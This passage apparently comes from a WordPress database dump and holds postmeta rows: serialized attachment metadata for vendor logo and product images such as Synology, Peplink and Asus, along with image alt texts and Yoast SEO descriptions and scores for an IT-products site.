;s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1890,1773,'_wp_attached_file','2018/12/Nivivo-Logo.png'),(1891,1773,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:23:\"2018/12/Nivivo-Logo.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"Nivivo-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"Nivivo-Logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"Nivivo-Logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"Nivivo-Logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:23:\"Nivivo-Logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:23:\"Nivivo-Logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:23:\"Nivivo-Logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:21:\"Nivivo-Logo-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1892,1774,'_wp_attached_file','2018/12/Nuance-Logo.png'),(1893,1774,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:23:\"2018/12/Nuance-Logo.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"Nuance-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"Nuance-Logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"Nuance-Logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"Nuance-Logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:23:\"Nuance-Logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:23:\"Nuance-Logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:23:\"Nuance-Logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:21:\"Nuance-Logo-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1894,1775,'_wp_attached_file','2018/12/Peplink-Logo.png'),(1895,1775,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:24:\"2018/12/Peplink-Logo.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Peplink-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Peplink-Logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Peplink-Logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Peplink-Logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"Peplink-Logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"Peplink-Logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:24:\"Peplink-Logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:22:\"Peplink-Logo-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1896,1776,'_wp_attached_file','2018/12/StorageCraft-Logo.png'),(1897,1776,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:29:\"2018/12/StorageCraft-Logo.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"StorageCraft-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"StorageCraft-Logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"StorageCraft-Logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"StorageCraft-Logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:29:\"StorageCraft-Logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:29:\"StorageCraft-Logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:29:\"StorageCraft-Logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:27:\"StorageCraft-Logo-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1898,1777,'_wp_attached_file','2018/12/Synology-Logo.png'),(1899,1777,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:25:\"2018/12/Synology-Logo.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Synology-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Synology-Logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Synology-Logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"Synology-Logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"Synology-Logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"Synology-Logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"Synology-Logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:23:\"Synology-Logo-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1901,1370,'_thumbnail_id','1771'),(1902,1768,'_wp_attachment_image_alt','Acronis Logo'),(1903,1324,'_thumbnail_id','1768'),(1904,1324,'_yoast_wpseo_metadesc','Backup software, disaster recovery, and secure data access'),(1905,1324,'_yoast_wpseo_content_score','60'),(1906,1769,'_wp_attachment_image_alt','Atlas.ti Logo'),(1907,1342,'_thumbnail_id','1769'),(1908,1342,'_yoast_wpseo_metadesc','Qualitative Data Analysis & Research Software'),(1909,1342,'_yoast_wpseo_content_score','60'),(1910,1770,'_wp_attachment_image_alt','Belkin Logo'),(1911,1348,'_thumbnail_id','1770'),(1912,1348,'_yoast_wpseo_content_score','60'),(1913,1772,'_wp_attachment_image_alt','Infocus Logo'),(1914,1390,'_thumbnail_id','1772'),(1915,1390,'_yoast_wpseo_content_score','60'),(1916,1774,'_wp_attachment_image_alt','Nuance Logo'),(1917,1411,'_thumbnail_id','1774'),(1918,1411,'_yoast_wpseo_metadesc','Healthcare AI Solutions, Print, capture & PDF Solutions'),(1919,1411,'_yoast_wpseo_content_score','90'),(1920,1773,'_wp_attachment_image_alt','Nvivo Logo'),(1921,1415,'_thumbnail_id','1773'),(1922,1415,'_yoast_wpseo_metadesc','Qualitative data analysis computer software package'),(1923,1415,'_yoast_wpseo_content_score','60'),(1924,1775,'_wp_attachment_image_alt','Peplink Logo'),(1925,1420,'_thumbnail_id','1775'),(1926,1420,'_yoast_wpseo_metadesc','Dual-WAN, Multi-WAN Internet Link Load Balancing Routers'),(1927,1420,'_yoast_wpseo_content_score','60'),(1928,1776,'_wp_attachment_image_alt','StorageCraft Logo'),(1929,1461,'_thumbnail_id','1776'),(1930,1461,'_yoast_wpseo_metadesc','Data Backup Software on-premises, cloud-based or hybrid deployments'),(1931,1461,'_yoast_wpseo_content_score','60'),(1932,1777,'_wp_attachment_image_alt','Synology Logo'),(1933,1467,'_thumbnail_id','1777'),(1934,1467,'_yoast_wpseo_metadesc','Network Attached Storage (NAS)'),(1935,1467,'_yoast_wpseo_content_score','60'),(1936,1701,'_wp_attachment_image_alt','NetApp Logo'),(1937,1408,'_thumbnail_id','1701'),(1938,1408,'_yoast_wpseo_metadesc','Data Storage, Cloud Data Services, Data Infrastructure Management, Data Backup And Recovery, All Flash Storage and Hybrid Flash Storage'),(1939,1408,'_yoast_wpseo_content_score','60'),(1940,1447,'_yoast_wpseo_focuskw','benq'),(1941,1447,'_yoast_wpseo_linkdex','88'),(1942,1447,'_yoast_wpseo_content_score','30'),(1943,1335,'_yoast_wpseo_content_score','30'),(1944,1328,'_yoast_wpseo_content_score','30'),(1945,1451,'_yoast_wpseo_content_score','60'),(1946,1349,'_yoast_wpseo_content_score','90'),(1947,1451,'_yoast_wpseo_focuskw','cambium'),(1948,1451,'_yoast_wpseo_linkdex','76'),(1949,1450,'_yoast_wpseo_content_score','90'),(1950,1800,'_wp_attached_file','2018/12/barcode-scanner.jpg'),(1951,1800,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:338;s:4:\"file\";s:27:\"2018/12/barcode-scanner.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"barcode-scanner-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"barcode-scanner-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:27:\"barcode-scanner-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:27:\"barcode-scanner-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:25:\"barcode-scanner-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1952,1801,'_wp_attached_file','2018/12/mobile-computer-and-tablet.jpg'),(1953,1801,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:338;s:4:\"file\";s:38:\"2018/12/mobile-computer-and-tablet.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"mobile-computer-and-tablet-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"mobile-computer-and-tablet-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:38:\"mobile-computer-and-tablet-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:38:\"mobile-computer-and-tablet-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:36:\"mobile-computer-and-tablet-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1954,1802,'_wp_attached_file','2018/12/printer.jpg'),(1955,1802,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:338;s:4:\"file\";s:19:\"2018/12/printer.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"printer-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"printer-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:19:\"printer-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:19:\"printer-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:17:\"printer-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1956,1619,'_yoast_wpseo_content_score','30'),(1957,1450,'_yoast_wpseo_focuskw','cisco'),(1958,1450,'_yoast_wpseo_linkdex','76'),(1960,1813,'_wp_attached_file','2018/12/AnyDesk-Logo.png'),(1961,1813,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:24:\"2018/12/AnyDesk-Logo.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"AnyDesk-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"AnyDesk-Logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"AnyDesk-Logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"AnyDesk-Logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"AnyDesk-Logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"AnyDesk-Logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:24:\"AnyDesk-Logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1962,1814,'_wp_attached_file','2018/12/Apple-Logo.png'),(1963,1814,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:22:\"2018/12/Apple-Logo.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Apple-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Apple-Logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Apple-Logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Apple-Logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:22:\"Apple-Logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:22:\"Apple-Logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:22:\"Apple-Logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:20:\"Apple-Logo-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1964,1815,'_wp_attached_file','2018/12/Aruba.png'),(1965,1815,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:17:\"2018/12/Aruba.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"Aruba-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"Aruba-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"Aruba-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:18:\"Aruba-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:17:\"Aruba-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:17:\"Aruba-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:17:\"Aruba-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:15:\"Aruba-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1966,1816,'_wp_attached_file','2018/12/Asus-Logo.png'),(1967,1816,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:21:\"2018/12/Asus-Logo.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"Asus-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"Asus-Logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"Asus-Logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"Asus-Logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:21:\"Asus-Logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:21:\"Asus-Logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:21:\"Asus-Logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:19:\"Asus-Logo-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\